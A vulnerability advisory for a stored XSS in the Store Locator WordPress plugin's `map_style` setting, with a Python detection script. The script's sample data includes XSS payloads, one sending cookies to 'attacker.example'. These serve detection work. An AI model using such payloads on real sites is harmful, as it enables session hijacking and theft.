CVE-2026-9060
Status: Deferred - Pending Action

Stored XSS in Store Locator WordPress Plugin

Vulnerability report for CVE-2026-9060, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: WPScan

Description

The Store Locator WordPress plugin before 1.6.6 does not sanitize and escape one of its settings before storing it and outputting it on the plugin's admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network, where a site administrator lacks that capability but the super admin who visits the page executes the injected script).

Meta Information

Published: 2026-06-10
Last Modified: 2026-06-10
Generated: 2026-06-30
AI Q&A: 2026-06-10
EPSS Evaluated: 2026-06-29
External references: NVD, EUVD

Affected Vendors & Products

One associated CPE:
Vendor: agile_store_locator
Product: store_locator_wordpress_plugin
Version / Range: all versions before 1.6.6 (1.6.6 itself is not affected)

Exploitability

CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Executive Summary

The CVE-2026-9060 vulnerability affects the Agile Store Locator WordPress plugin versions prior to 1.6.6. It is a Stored Cross-Site Scripting (XSS) issue that allows high-privileged users, such as administrators, to inject malicious scripts via the `map_style` setting.

The plugin fails to properly sanitize and escape user input before storing it and displaying it on the admin page, enabling attackers to execute arbitrary JavaScript when an administrator views the page.

This vulnerability persists even when the `unfiltered_html` capability is restricted. The typical case is a multisite network: site administrators there do not hold `unfiltered_html`, yet one of them can still store the payload, and it runs in the browser of the super admin who later opens the affected page.

An attacker holding an administrator account can exploit this by sending a crafted AJAX request that writes an XSS payload into the `map_style` setting; the payload executes every time the plugin's admin page is rendered.

Impact Analysis

This vulnerability allows high-privileged users to perform Stored Cross-Site Scripting attacks, which can lead to the execution of arbitrary JavaScript code within the admin interface.

Such attacks can be used to hijack administrator sessions, steal sensitive information, manipulate site settings, or perform other malicious actions with administrator privileges.

Because the payload executes on the admin page, it can compromise the security and integrity of the WordPress site, especially in multisite networks, where it runs with super-admin privileges even though the account that stored it lacked `unfiltered_html`.

Detection Guidance

This vulnerability can be detected by checking if the Agile Store Locator WordPress plugin version is prior to 1.6.6, as those versions are affected.

Additionally, detection can involve inspecting the `map_style` setting for suspicious or malicious JavaScript code injections.

A practical approach is to review the plugin's stored settings or database entries related to `map_style` for unexpected script tags or payloads.

Since the vulnerability can be exploited via crafted AJAX requests, monitoring HTTP requests to the plugin's AJAX endpoints for unusual or suspicious payloads targeting `map_style` may help detect exploitation attempts.

The advisory itself provides no detection commands.
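The checks above, as an added Python example written for this page (it is not code from the advisory, from WPScan or from the plugin): a version gate against 1.6.6, a heuristic scan of exported wp_options rows for script-like content in the `map_style` setting, and a filter over proxy-logged POST bodies to WordPress's standard AJAX endpoint `/wp-admin/admin-ajax.php`. The option name `example_map_style`, the `action=save_settings` form field and the sample rows and requests are constructed placeholders; the plugin's real option name and AJAX action are not given on this page, so the scan keys on the `map_style` string rather than on them.

```python
"""Detection helpers for CVE-2026-9060 (stored XSS via the `map_style`
setting of the Agile Store Locator WordPress plugin before 1.6.6).

Added example, not code from the advisory or from the plugin. Assumptions:
  * exploitation traffic reaches WordPress's standard endpoint
    /wp-admin/admin-ajax.php; the plugin's own `action` value is unknown
    and is therefore not matched on;
  * stored settings are reviewed as (option_name, option_value) rows
    exported from wp_options; the plugin's exact option name is unknown,
    so every row is scanned and rows mentioning `map_style` are prioritised;
  * request records come from a proxy or WAF that logs POST bodies.
"""
import re
from urllib.parse import parse_qs

FIXED_VERSION = (1, 6, 6)  # first fixed release per the advisory

# Heuristic indicators of an injected script in a setting value or request body.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),  # onerror=, onload=, ...
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "active_element": re.compile(r"<\s*(?:iframe|svg|img|object|embed)\b", re.I),
}


def parse_version(text: str) -> tuple:
    """Turn '1.6.5' (or '1.6', or 'Version: 1.6.5') into a 3-tuple of ints."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_vulnerable_version(version: str) -> bool:
    """True for every release before 1.6.6."""
    return parse_version(version) < FIXED_VERSION


def xss_indicators(value: str) -> list:
    """Names of the indicator patterns that match `value`, in table order."""
    return [name for name, rx in XSS_INDICATORS.items() if rx.search(value)]


def scan_options(rows):
    """Review wp_options-style (option_name, option_value) rows.

    Rows whose name or value mention `map_style` and trip an indicator are
    reported with priority 'high'; any other row that trips an indicator is
    still reported ('low'), because the plugin's option name is not known.
    """
    findings = []
    for name, value in rows:
        hits = xss_indicators(value)
        if not hits:
            continue
        related = "map_style" in name or "map_style" in value
        findings.append({"option": name, "indicators": hits,
                         "priority": "high" if related else "low"})
    return findings


def flag_ajax_requests(records):
    """Pick out POSTs to admin-ajax.php whose urlencoded body carries a
    `map_style` parameter that trips an indicator. Each record is a dict
    with 'method', 'uri', 'body' and 'user'."""
    flagged = []
    for rec in records:
        if rec["method"] != "POST" or not rec["uri"].endswith("/wp-admin/admin-ajax.php"):
            continue
        form = parse_qs(rec["body"], keep_blank_values=True)
        for raw in form.get("map_style", []):
            hits = xss_indicators(raw)
            if hits:
                flagged.append({"user": rec["user"], "indicators": hits, "map_style": raw})
    return flagged


# Constructed sample data (not real captures). `example_map_style` is a
# hypothetical option name; the plugin's real one is not given in the advisory.
SAMPLE_OPTIONS = [
    ("example_map_style", '[{"featureType":"water","stylers":[{"color":"#1f3a5f"}]}]'),
    ("example_map_style", '"><img src=x onerror=alert(document.cookie)>'),
    ("blogname", "Example Shop"),
    ("widget_text", 'Visit us <a href="javascript:void(0)">here</a>'),
]

# `action=save_settings` is a placeholder; the plugin's real action is unknown.
SAMPLE_REQUESTS = [
    {"method": "POST", "uri": "/wp-admin/admin-ajax.php", "user": "siteadmin",
     "body": "action=save_settings&map_style=%5B%7B%22featureType%22%3A%22water%22%7D%5D"},
    {"method": "POST", "uri": "/wp-admin/admin-ajax.php", "user": "siteadmin",
     "body": "action=save_settings&map_style=%3Cscript%3Efetch%28%27https%3A%2F%2F"
             "attacker.example%2F%27%2Bdocument.cookie%29%3C%2Fscript%3E"},
    {"method": "GET", "uri": "/wp-admin/admin.php", "user": "superadmin", "body": ""},
]

if __name__ == "__main__":
    print("1.6.5 vulnerable:", is_vulnerable_version("1.6.5"))
    for f in scan_options(SAMPLE_OPTIONS):
        print("option", f["option"], f["priority"], f["indicators"])
    for r in flag_ajax_requests(SAMPLE_REQUESTS):
        print("request by", r["user"], r["indicators"])
```

The indicator table is deliberately a heuristic: a legitimate `map_style` value is normally a JSON array of styler rules and contains no tags, event handlers or `javascript:` URIs, so any hit in that setting deserves a manual look, while hits elsewhere (the `widget_text` row above) are reported at low priority rather than dropped.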

Mitigation Strategies

The immediate mitigation step is to update the Agile Store Locator WordPress plugin to version 1.6.6 or later, where the vulnerability has been fixed.

Until the update can be applied, keep the set of accounts that can reach the Store Locator settings page as small as possible: any such account can store the payload, and every administrator who views the page runs it.

Also, consider reviewing and sanitizing the `map_style` setting manually to remove any injected scripts.

Compliance Impact

The vulnerability allows high-privileged users to perform Stored Cross-Site Scripting (XSS) attacks by injecting malicious scripts into the plugin's settings, which are then executed on the admin page.

Such XSS vulnerabilities can lead to unauthorized access to sensitive information or administrative functions, potentially compromising data confidentiality and integrity.

This could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal data and secure handling of administrative access.

However, the vulnerability requires high-privileged user access to exploit, which may limit the scope of impact depending on the environment's user management and security controls.
